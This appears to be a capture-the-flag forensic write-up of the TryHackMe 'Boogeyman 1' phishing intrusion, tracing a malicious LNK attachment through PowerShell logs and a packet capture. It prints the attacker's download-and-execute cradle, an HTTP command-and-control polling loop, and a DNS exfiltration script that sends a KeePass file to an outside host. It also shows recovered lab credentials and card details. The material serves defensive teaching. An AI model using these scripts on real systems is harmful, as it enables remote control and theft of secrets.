Boogeyman 1

A new threat actor emerges from the wild using the name Boogeyman. Are you afraid of the Boogeyman?

CONTEXT

Challenge Link: TryHackMe - BoogeyMan 1

I. Background

Julianne, a finance employee working for Quick Logistics LLC, received a follow-up email regarding an unpaid invoice from their business partner, B Packaging Inc. Unbeknownst to her, the attached document was malicious and compromised her workstation.

II. Tools and Artifacts

1. Exfiltration

$ impacket-smbserver jebidiah . -smb2support
ubuntu@tryhackme:~$ cd Desktop

ubuntu@tryhackme:~/Desktop$ zip -r artefacts.zip artefacts/*  
  
  [..omitted..]
  
ubuntu@tryhackme:~/Desktop$ smbclient //10.8.81.251/jebidiah -c 'put artefacts.zip' -N

  putting file artefacts.zip as \artefacts.zip (2551.7 kb/s) (average 2551.7 kb/s)
$ unzip artefacts.zip

$ ls artefacts

  capture.pcapng  dump.eml  evtx2json  powershell.evtx  powershell.json

2. PowerShell Events

$ cat powershell.json | jq -r '.EventID' | sort | uniq -c | sort -bnr

    939 4104
     44 4100
      2 53504
      1 40962
      1 40961

3. Protocol Hierarchy

$ tshark -r capture.pcapng | sed -e 's/^[ ]*\w*\s*//g' | sed -E 's/\s{2,}/ /g' | cut -d' ' -f5 | sort | uniq -c | sort -bnr

  38769 TCP
   3422 TLSv1.3
   2060 QUIC
   1989 HTTP
   1229 DNS
   1084 TLSv1.2
     82 SSDP
     77 TLSv1
     74 ARP
     14 UDP
     12 NBNS
     10 MDNS
      7 HTTP/XML
      5 SSLv2
      5 IGMPv3
      5 ICMPv6
      5 ICMP
      5 BROWSER
      2 LLMNR
      2 DHCP

ANALYSIS

I. Email Analysis

The security team was able to flag the suspicious execution of the attachment, in addition to the phishing reports received from the other finance department employees, making it seem to be a targeted attack on the finance team. Upon checking the latest trends, the initial TTP used for the malicious attachment is attributed to the new threat group named Boogeyman, known for targeting the logistics sector.

1. Exchange Information

Looking at the following information, an email was sent by Arthur Griffin (agriffin@bpakcaging.xyz) to Julianne Westcott (julianne.westcott@hotmail.com):

From: Arthur Griffin <agriffin@bpakcaging.xyz>
Date: Fri, 13 Jan 2023 09:25:26 +0000
Subject: Collection for Quick Logistics LLC - Jan 2023
Message-Id: <4uiwqc5wd1qx.HPk2p-JE_jYbkWIRB-SmuA2@tracking.bpakcaging.xyz>
Reply-To: Arthur Griffin <agriffin@bpakcaging.xyz>
Sender: agriffin@bpakcaging.xyz
To: Julianne Westcott <julianne.westcott@hotmail.com>

2. Security Headers

Both SPF and DMARC were marked as passed, which makes email spoofing unlikely. The email also passed the DKIM check, with two signatures detected: bpakcaging.xyz and elasticemail.com. The latter appears to be the MTA (Mail Transfer Agent) used by the attacker.

Authentication-Results: spf=pass (sender IP is 15.235.99.80)
 smtp.mailfrom=bpakcaging.xyz; dkim=pass (signature was verified)
 header.d=bpakcaging.xyz;dmarc=bestguesspass action=none
 header.from=bpakcaging.xyz;compauth=pass reason=109
Received-SPF: Pass (protection.outlook.com: domain of bpakcaging.xyz
 designates 15.235.99.80 as permitted sender) receiver=protection.outlook.com;
 client-ip=15.235.99.80; helo=pa80.mxout.mta1.net; pr=C
DKIM-Signature: v=1; a=rsa-sha256; d=bpakcaging.xyz; s=api; c=relaxed/simple;
	t=1673601926; h=from:date:subject:reply-to:to:list-unsubscribe:mime-version;
	bh=DORzQK4K9VXO5g47mYpyX7cPagIyvAX1RLfbY0szvCc=;
	b=dCB9MhhsZqg4h2P9dg5zMjLj7HVS9vt0fXuqEzH8cj6ft+YBJxvZHkF8uc+CeOas6CoICaPu13Q
	oL/xVebg3aO8bmlooJWTAZx7mmrh/1ZQBVHm3wvGVI9Xn55nhWzRGoqVOAAPPM6+MEHFwZDIjKDAs
	RpDurrnykQeCXCp127k=
DKIM-Signature: v=1; a=rsa-sha256; d=elasticemail.com; s=api;
	c=relaxed/simple; t=1673601926;
	h=from:date:subject:reply-to:to:list-unsubscribe;
	bh=DORzQK4K9VXO5g47mYpyX7cPagIyvAX1RLfbY0szvCc=;
	b=jcC3z+U5lVQUJEYRyQ76Z+xaJMrXN2YdjyM8pUl7hgXesQaY7rqSORNRWynpDQ3/CBSllw31eDq
	WmoqpFqj2uVy5RXK73lkBEHs5ju1eH/4svHpZLS9+wU/tO5dfZVUImvY32iinpJCtoiMLjdpKYMA/
	d5BBGqluALtqy9fZQzM=

3. Email Body

The body states that the encrypted attachment can be opened with the password Invoice2023!.

<html>
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dutf-8"></=
head>
<body style=3D"font-size: 13px; font-family: Helvetica;">
<br>
<p>Hi Julianne,</p>

<p>I hope you are well.</p>

<p>I just wanted to drop you a quick note to remind you in respect of docum=
ent #39586972 is due for payment on January 20, 2023.</p>

<p>I would be grateful if you could confirm everything is on track for paym=
ent.</p>

<p>For additional information, kindly see the attached document.<br><br>
You may use this code to view the encrypted file: <strong>Invoice2023!</str=
ong></p>


<p>Best regards,<br>
<strong>Arthur Griffin</strong><br>
Collections Officer<br>
B Packaging Inc.<br><br>

4. Email Attachment

A zip file, Invoice.zip, was attached to the email.

--=-eZCfLFLerDWBDeKhYPAtYh7o4CYv5vMw7XWKyw==
Content-Type: application/zip
Content-Disposition: attachment; filename="Invoice.zip"; size=908;
Content-Transfer-Encoding: base64

--=-eZCfLFLerDWBDeKhYPAtYh7o4CYv5vMw7XWKyw==--

Decoding the base64 attachment and extracting its contents using the given password, Invoice2023!:

$ cat Invoice.zip_b64 | tr -d '\n' | base64 -d > Invoice.zip

$ file Invoice.zip          

  Invoice.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
  
$ unzip Invoice.zip  

  Archive:  Invoice.zip
  [Invoice.zip] Invoice_20230103.lnk password: Invoice2023!
  zsh: suspended  unzip Invoice.zip

Examining the contents of Invoice_20230103.lnk:

$ lnkparse Invoice_20230103.lnk 

  Windows Shortcut Information:
     Link CLSID: 00021401-0000-0000-C000-000000000046
     Link Flags: HasTargetIDList | HasName | HasRelativePath | HasWorkingDir | HasArguments | HasIconLocation | IsUnicode | HasExpIcon - (16637)
     File Flags:  - (0)

     Creation Timestamp: None
     Modified Timestamp: None
     Accessed Timestamp: None

     Icon Index: 0 
     Window Style: SW_SHOWMINNOACTIVE 
     HotKey: CONTROL - C {0x4302} 

     TARGETS:
        Index: 78
        ITEMS:
           Root Folder
              Sort index: My Computer
              Guid: 20D04FE0-3AEA-1069-A2D8-08002B30309D
           Volume Item
              Flags: 0xf
              Data: None
           File entry
              Flags: Is directory
              Modification time: None
              File attribute flags: 16
              Primary name: Windows
           File entry
              Flags: Is directory
              Modification time: None
              File attribute flags: 16
              Primary name: System32
           File entry
              Flags: Is directory
              Modification time: None
              File attribute flags: 16
              Primary name: WindowsPowerShell
           File entry
              Flags: Is directory
              Modification time: None
              File attribute flags: 16
              Primary name: v1.0
           File entry
              Flags: Is file
              Modification time: None
              File attribute flags: 0
              Primary name: powershell.exe

     DATA
        Description: Invoice Jan 2023
        Relative path: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Working directory: C:
        Command line arguments: -nop -windowstyle hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==
        Icon location: C:\Users\Administrator\Desktop\excel.ico

     EXTRA BLOCKS:
        ICON_LOCATION_BLOCK
           Target ansi: %USERPROFILE%\Desktop\excel.ico
           Target unicode: %USERPROFILE%\Desktop\excel.ico
        SPECIAL_FOLDER_LOCATION_BLOCK
           Special folder id: 37
        KNOWN_FOLDER_LOCATION_BLOCK
           Known folder id: 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7
        METADATA_PROPERTIES_BLOCK
           Version: 0x53505331
           Format id: 46588AE2-4CBC-4338-BBFC-139326986DCE

The shortcut executes an encoded PowerShell command which, when decoded, downloads a file named update and executes it in memory:

iex (new-object net.webclient).downloadstring('http://files.bpakcaging.xyz/update')

II. Log Analysis

Based on the initial findings, we discovered how the malicious attachment compromised Julianne's workstation:

  • A PowerShell command was executed.

  • Decoding the payload reveals the starting point of endpoint activities.

1. Timestamp Fix

The included JSON is not in chronological order; to sort the events by timestamp:

$ cat powershell.json | jq -s -c 'sort_by(.Timestamp) | .[]' > powershell1.json

2. PowerShell Logs

Looking at the executions relevant to this case, the attacker was able to do the following:

$ cat powershell1.json | grep 4104 | jq '.ScriptBlockText' | grep -v Set-StrictMode

The initial execution, which downloads update from http://files.bpakcaging.xyz:

iex (new-object net.webclient).downloadstring('http://files.bpakcaging.xyz/update')

Establish a C2 connection via HTTP protocol tunnelling to cdn.bpakcaging.xyz:8080:

$s='cdn.bpakcaging.xyz:8080';$i='8cce49b0-b86459bb-27fe2489';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/8cce49b0 -Headers @{"X-38d2-8f49"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/b86459bb -Headers @{"X-38d2-8f49"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/27fe2489 -Method POST -Headers @{"X-38d2-8f49"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}\n

Which when expanded:

$s='cdn.bpakcaging.xyz:8080';
$i='8cce49b0-b86459bb-27fe2489';
$p='http://';
$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/8cce49b0 -Headers @{"X-38d2-8f49"=$i};
while ($true){
    $c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/b86459bb -Headers @{"X-38d2-8f49"=$i}).Content;
    if ($c -ne 'None') {
        $r=iex $c -ErrorAction Stop -ErrorVariable e;
        $r=Out-String -InputObject $r;
        $t=Invoke-WebRequest -Uri $p$s/27fe2489 -Method POST -Headers @{"X-38d2-8f49"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')
    } sleep 0.8
}

Download and execute Seatbelt (a host enumeration tool) on the workstation:

cd Users;pwd
cd j.westcott;pwd
ps;pwd
iex(new-object net.webclient).downloadstring('https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Seatbelt.ps1');pwd
cd Public;pwd
cd Music;pwd
iwr http://files.bpakcaging.xyz/sb.exe -outfile sb.exe;pwd
.\\sb.exe all;pwd
.\\sb.exe system;pwd
.\\sb.exe;pwd
.\\sb.exe -group=all;pwd
Seatbelt.exe -group=user;pwd
.\\sb.exe -group=user;pwd

Locate a KeePass database -- C:\Users\j.westcott\Documents\protected_data.kdbx

 ls C:\\Users\\j.westcott\\Documents\\protected_data.kdbx;pwd

Read the SQLite3 database of Microsoft Sticky Notes stored in the user's Local AppData folder:

C:\Users\j.westcott\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

cd ..\\AppData;pwd
ls Local;pwd
ls Local\\Packages;pwd
cd ..;pwd
ls AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe;pwd
ls AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState;pwd
iwr http://files.bpakcaging.xyz/sq3.exe -outfile sq3.exe;pwd
.\\sq3.exe AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\;pwd
.\\Music\\sq3.exe AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite "SELECT * from NOTE limit 100";pwd

Exfiltrate the contents of protected_data.kdbx via DNS, using nslookup against 167.71.211.113 with hex chunks of the file as subdomains of bpakcaging.xyz.

$file='protected_data.kdbx'; $destination = "167.71.211.113"; $bytes = [System.IO.File]::ReadAllBytes($file);;pwd
split-path $pwd'\\0x00';pwd
$file='C:\\Users\\j.westcott\\Documents\\protected_data.kdbx'; $destination = "167.71.211.113"; $bytes = [System.IO.File]::ReadAllBytes($file);;pwd
$hex = ($bytes|ForEach-Object ToString X2) -join '';;pwd
$split = $hex -split '(\\S{50})'; ForEach ($line in $split) { nslookup -q=A "$line.bpakcaging.xyz" $destination;} echo "Done";;pwd

Which when cleaned up a bit:

$file='protected_data.kdbx'; 
$destination = "167.71.211.113"; 
$bytes = [System.IO.File]::ReadAllBytes($file);
split-path $pwd'\\0x00';
$file='C:\\Users\\j.westcott\\Documents\\protected_data.kdbx'; 
$destination = "167.71.211.113"; 
$bytes = [System.IO.File]::ReadAllBytes($file);
$hex = ($bytes|ForEach-Object ToString X2) -join '';
$split = $hex -split '(\\S{50})'; 
ForEach ($line in $split) { 
    nslookup -q=A "$line.bpakcaging.xyz" $destination;
} 
echo "Done";

III. Network Analysis

Based on the PowerShell logs investigation, we have seen the full impact of the attack:

  • The threat actor was able to read and exfiltrate two potentially sensitive files.

  • The domains and ports used for the network activity were discovered, including the tool used by the threat actor for exfiltration.

1. HTTP Traffic

Looking at the servers associated with the domain, bpakcaging.xyz:

$ tshark -r capture.pcapng -Y 'http.response_for.uri contains "bpakcaging.xyz" and http' -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.(server)")) then ({key: "server", value: .value}) else empty end) | .server' | sort | uniq -c | sort -nr

    929 Apache/2.4.1 
      3 SimpleHTTP/0.6 Python/3.10.7
      

Two HTTP servers were identified: an Apache server and a Python SimpleHTTP server. Given its low request count, the latter is likely the file server from which the executables found during the log analysis were downloaded:

$ tshark -r capture.pcapng -Y 'http.server contains "Python" and http' -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.(res.*uri)")) then ({key: "uri", value: .value}) else empty end) | .uri' 

  http://files.bpakcaging.xyz/update
  http://files.bpakcaging.xyz/sb.exe
  http://files.bpakcaging.xyz/sq3.exe

All requests to the Apache server could be traced to http://cdn.bpakcaging.xyz:8080:

$ tshark -r capture.pcapng -Y 'http.server contains "Apache" and http' -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.(res.*uri)")) then ({key: "uri", value: .value}) else empty end) | .uri' | sort | uniq -c | sort -nr

    886 http://cdn.bpakcaging.xyz:8080/b86459bb
     42 http://cdn.bpakcaging.xyz:8080/27fe2489
      1 http://cdn.bpakcaging.xyz:8080/8cce49b0

In addition, all requests made to /27fe2489 were POST requests:

$ tshark -r capture.pcapng -Y 'http.request.full_uri contains "/27fe2489" and http' -T json | jq -r '.[]."_source".layers.http' | grep request.method | sed -E 's/.*".*": "(.*)",/\1/g' | sort | uniq -c | sort -nr

     42 POST
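The request counts above match the polling loop recovered from the PowerShell logs: one registration GET, a tight loop of GETs to /b86459bb, and a POST to /27fe2489 for each task result. As an added Python example (not part of the original writeup), the script below reads the shape of `tshark -T fields -e frame.time_epoch -e http.request.method -e http.request.full_uri` output and flags URIs fetched repeatedly at a near-constant interval; the request lines are constructed to mimic the 0.8 s sleep in the recovered script, and the thresholds are assumptions.

```python
import statistics
from collections import defaultdict

# Constructed sample (tab separated), modelled on the capture: one GET to the
# registration URI, a steady poll of /b86459bb, one POST with results, and
# two one-off downloads from the Python file server.
SAMPLE_REQUESTS = """\
1673602000.000\tGET\thttp://cdn.bpakcaging.xyz:8080/8cce49b0
1673602000.850\tGET\thttp://cdn.bpakcaging.xyz:8080/b86459bb
1673602001.700\tGET\thttp://cdn.bpakcaging.xyz:8080/b86459bb
1673602002.560\tGET\thttp://cdn.bpakcaging.xyz:8080/b86459bb
1673602003.400\tGET\thttp://cdn.bpakcaging.xyz:8080/b86459bb
1673602003.410\tPOST\thttp://cdn.bpakcaging.xyz:8080/27fe2489
1673602004.250\tGET\thttp://cdn.bpakcaging.xyz:8080/b86459bb
1673602005.100\tGET\thttp://cdn.bpakcaging.xyz:8080/b86459bb
1673602000.300\tGET\thttp://files.bpakcaging.xyz/update
1673602030.000\tGET\thttp://files.bpakcaging.xyz/sb.exe
"""


def parse_requests(text):
    """Parse 'epoch<TAB>method<TAB>uri' lines into (float, str, str) tuples."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, method, uri = line.split("\t")
        rows.append((float(ts), method, uri))
    return rows


def beacon_candidates(rows, min_requests=5, max_jitter=0.2):
    """Group GET requests by URI and flag URIs polled repeatedly at a
    near-constant interval. Returns {uri: (request_count, mean_gap_seconds)}.
    min_requests and max_jitter (relative std-dev of the gaps) are assumed
    thresholds, not values from the writeup."""
    by_uri = defaultdict(list)
    for ts, method, uri in rows:
        if method == "GET":
            by_uri[uri].append(ts)
    findings = {}
    for uri, times in by_uri.items():
        if len(times) < min_requests:
            continue  # one-off downloads never qualify
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        jitter = statistics.pstdev(gaps) / mean if mean else 0.0
        if jitter <= max_jitter:
            findings[uri] = (len(times), round(mean, 2))
    return findings


if __name__ == "__main__":
    for uri, (count, gap) in beacon_candidates(parse_requests(SAMPLE_REQUESTS)).items():
        print(f"{uri}: {count} polls, mean interval {gap}s")
```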

2. Command Executions

Looking at the POST data of a sample packet, it contains what appear to be space-separated decimal byte values:

$ tshark -r capture.pcapng -Y 'http.request.full_uri contains "/27fe2489" and http' -T json| jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.file_data")) then ({key: "data", value: .value}) else empty end) | .data' | head -n1

  13 13 10 13 10 80 97 116 104 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 13 10 45 45 45 45 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 13 10 67 58 92 87 105 110 100 111 119 115 92 115 121 115 116 101 109 51 50 13 10 13 10 13 10

Now, converting the data of all POST requests from decimal to ASCII:

$ tshark -r capture.pcapng -Y 'http.request.full_uri contains "/27fe2489" and http' -T json| jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.file_data")) then ({key: "data", value: .value}) else empty end) | .data' > c2.data

$ for i in $(cat c2.data); do for x in $i; do hex=$(printf '%x' $x); echo -ne "\x$hex"; done; done

It shows that a KeePass database was indeed found on the workstation:

    Directory: C:\Users\j.westcott\Documents


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        1/13/2023   4:38 PM           2206 protected_data.kdbx

It also shows the Sticky Notes data files in which the master password was stored:

    Directory: C:\Users\j.westcott\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        1/13/2023   4:38 PM                DiagOutputDir                                                         
-a----        1/13/2023   4:30 PM           1014 Ecs.dat                                                               
-a----        1/13/2023   4:30 PM           4096 plum.sqlite                                                           
-a----        1/13/2023   4:38 PM          32768 plum.sqlite-shm                                                       
-a----        1/13/2023   5:08 PM         168952 plum.sqlite-wal

Where the password is -- %p9^3!lL^Mz47E2GaT^y:

\id=868150bd-a564-423b-9256-70d3781794b1 Master Password
\id=ad8b52f0-e1bb-40f6-bbf9-47a53f9180ab %p9^3!lL^Mz47E2GaT^y|ManagedPosition=DeviceId:\\?\DISPLAY#Default_Monitor#1&31c5ecd4&0&UID256#{e6f07b5f-ee97-4a90-b076-33f57bf4eaa7};Position=1106,43;Size=320,320|1|0||Yellow|0||||||0||8ca22c0e-ba5e-499a-a86c-7473a53dc6de|74f08724-ccc9-4ce6-94e7-8c99e6cd42c6|638092247397199589||638092247516107079

3. DNS Exfiltration

Based on the decoded POST data, the exfiltration attempt did indeed use subdomains of bpakcaging.xyz:

*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for 03D9A29A67FB4BB50100030002100031C1F2E6BF714350BE58.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for 05216AFC5AFF03040001000000042000AF4DE7A467FADFBFEB.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for EB78AE194B03926333E0CC968727A1FF8CC4CD5151FAAC0520.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for 00516334C81F95A871AE6F5C6BB97075B74C6016ADAD4C35B3.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for A327BFF48B837B4806080060EA0000000000000710000F22FE.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for 38943F8ED485C92DA84BCCE2E2082000C47157BAF0E6A7EF35.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for A00731B6CE6192813F7AC951F0C6460D89A27D91DE15C50920.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for 007187B84DD4E121AED3668F75F3761E8AAC3169F81025A5AE.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for 30D657448F4401890A0400020000000004000D0A0D0A3865AE.bpakcaging.xyz 
*** UnKnown can't find .bpakcaging.xyz: Unspecified error 
*** No address (A) records available for FAA72AA7E2FC9869F30F566E4F58A19582BDA4C0988D8E9F6C.bpakcaging.xyz
[..omitted..]

The chunked, exfiltrated data can also be seen in the packet capture:

$ tshark -r capture.pcapng -Y "dns" -T fields -e dns.qry.name | grep -E '[A-F0-9]+.bpakcaging.xyz$' | head -n 10                                                

  03D9A29A67FB4BB50100030002100031C1F2E6BF714350BE58.bpakcaging.xyz
  03D9A29A67FB4BB50100030002100031C1F2E6BF714350BE58.bpakcaging.xyz
  05216AFC5AFF03040001000000042000AF4DE7A467FADFBFEB.bpakcaging.xyz
  05216AFC5AFF03040001000000042000AF4DE7A467FADFBFEB.bpakcaging.xyz
  EB78AE194B03926333E0CC968727A1FF8CC4CD5151FAAC0520.bpakcaging.xyz
  EB78AE194B03926333E0CC968727A1FF8CC4CD5151FAAC0520.bpakcaging.xyz
  00516334C81F95A871AE6F5C6BB97075B74C6016ADAD4C35B3.bpakcaging.xyz
  00516334C81F95A871AE6F5C6BB97075B74C6016ADAD4C35B3.bpakcaging.xyz
  A327BFF48B837B4806080060EA0000000000000710000F22FE.bpakcaging.xyz
  A327BFF48B837B4806080060EA0000000000000710000F22FE.bpakcaging.xyz

Cleaning the chunked data and putting it together retrieves the KeePass database file:

$ tshark -r capture.pcapng -Y "ip.dst==167.71.211.113 and dns" -T fields -e dns.qry.name | grep -E '[A-F0-9]+.bpakcaging.xyz$' | cut -d'.' -f1 | tr -d '\n' | xxd -p -r > protected_data.kdbx
                                                                                                                                                                                                                                            
$ file protected_data.kdbx 

  protected_data.kdbx: Keepass password database 2.x KDBX
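The reconstruction above can also be scripted so that it copes with the duplicate queries visible in the capture and verifies the result before anyone opens it. The following is an added Python example (not part of the original writeup) that takes dns.qry.name output, drops the empty labels produced by the attacker's split regex, collapses repeated queries, reassembles the hex, and checks the KDBX signature and version; the query list is constructed from the first chunks shown above.

```python
import re
import struct

# Constructed sample of dns.qry.name values, modelled on the capture:
# each query appears twice, the attacker's `-split '(\S{50})'` also produced
# empty labels (".bpakcaging.xyz"), and an ordinary hostname is mixed in.
SAMPLE_QUERIES = """\
.bpakcaging.xyz
03D9A29A67FB4BB50100030002100031C1F2E6BF714350BE58.bpakcaging.xyz
03D9A29A67FB4BB50100030002100031C1F2E6BF714350BE58.bpakcaging.xyz
.bpakcaging.xyz
05216AFC5AFF03040001000000042000AF4DE7A467FADFBFEB.bpakcaging.xyz
05216AFC5AFF03040001000000042000AF4DE7A467FADFBFEB.bpakcaging.xyz
files.bpakcaging.xyz
EB78AE194B03926333E0CC968727A1FF8CC4CD5151FAAC0520.bpakcaging.xyz
EB78AE194B03926333E0CC968727A1FF8CC4CD5151FAAC0520.bpakcaging.xyz
"""

# A label is a run of whole hex bytes (the script chunked on 50 hex chars,
# so the final chunk may be shorter but is still an even number of digits).
HEX_LABEL = re.compile(r"^((?:[0-9A-F]{2}){1,25})\.bpakcaging\.xyz$")

# KDBX file signature as stored on disk (little-endian uint32 pair).
KDBX_SIG1 = 0x9AA2D903
KDBX_SIG2 = 0xB54BFB67


def extract_chunks(lines):
    """Return the ordered hex chunks, collapsing consecutive duplicate queries.
    Caveat: if the file genuinely contains two identical adjacent 25-byte
    chunks, this collapse would drop one; when the capture has the exfil
    server's IP, filtering on ip.dst (as in the tshark command above) is
    the safer way to remove the duplicate lookups."""
    chunks = []
    for line in lines.splitlines():
        m = HEX_LABEL.match(line.strip())
        if not m:
            continue  # empty label, normal hostname, or non-hex data
        if chunks and chunks[-1] == m.group(1):
            continue  # same query seen twice in the capture
        chunks.append(m.group(1))
    return chunks


def reassemble(lines):
    """Concatenate the chunks and decode the hex back into file bytes."""
    return bytes.fromhex("".join(extract_chunks(lines)))


def kdbx_header(data):
    """Validate the KDBX signature; return (major, minor) version or None."""
    if len(data) < 12:
        return None
    sig1, sig2, minor, major = struct.unpack("<IIHH", data[:12])
    if sig1 != KDBX_SIG1 or sig2 != KDBX_SIG2:
        return None
    return (major, minor)


if __name__ == "__main__":
    blob = reassemble(SAMPLE_QUERIES)
    print(len(blob), "bytes recovered, KDBX version:", kdbx_header(blob))
```

The first chunk alone already carries the KDBX signature, so the check can be run on a partial capture to confirm what is being exfiltrated before the full file is reassembled.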

Finally, opening the KeePass database with the password, %p9^3!lL^Mz47E2GaT^y, reveals a company card entry with the account number 4024007128269551:

$ kpcli --kdb=protected_data.kdbx 
Provide the master password: *************************

kpcli:/> dir

  === Groups ===
  protected_data/

kpcli:/> cd protected_data

kpcli:/protected_data> dir

  === Groups ===
  eMail/
  General/
  Homebanking/
  Internet/
  Network/
  Recycle Bin/
  Windows/

kpcli:/protected_data> cd Homebanking

kpcli:/protected_data/Homebanking> dir

  === Entries ===
  0. Company Card                                                           

kpcli:/protected_data/Homebanking> show 0

  Title: Company Card
  Uname: 
   Pass: 
    URL: 
  Notes: 
  String Values: 
           1) Account Number = 4024007128269551
           2) CVV = 970
           3) Expiration Date = 3/2028
           4) Name = Quick Logistics LLC
